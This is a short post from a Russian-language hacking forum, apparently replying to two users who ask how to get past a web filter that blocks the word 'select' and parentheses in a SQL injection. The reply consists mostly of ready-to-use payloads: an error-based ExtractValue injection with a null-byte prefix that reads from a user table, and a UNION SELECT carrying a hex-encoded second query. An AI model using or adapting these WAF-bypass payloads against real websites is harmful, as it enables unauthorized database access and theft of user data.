24.05.2014, 09:34
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Sanic1977
Есть скуля, как обойти фильтрацию на "select", на слово "select" выдает 403 Forbidden, пример запроса
?id=1'or(ExtractValue(1,concat(0x3a,(select(count( *))from(website.user)))))=1
Код:
?id=%001'or(ExtractValue(1,concat(0x3a,(select(count(*))from(website.user)))))or'
Сообщение от BigBear
Эксплуатация сильно затруднена в связи с тем, что фильтруются скобки.
No problem
Код:
28006%20and%200%20UNION%20SELECT%200x3120616e64203020554e494f4e2053454c4543542076657273696f6e28292c2032202d2d
Первая скуля подходит даже больше, чем вторая. Инъекция в категориях, там обычно всегда более 1 запроса.
|
|
|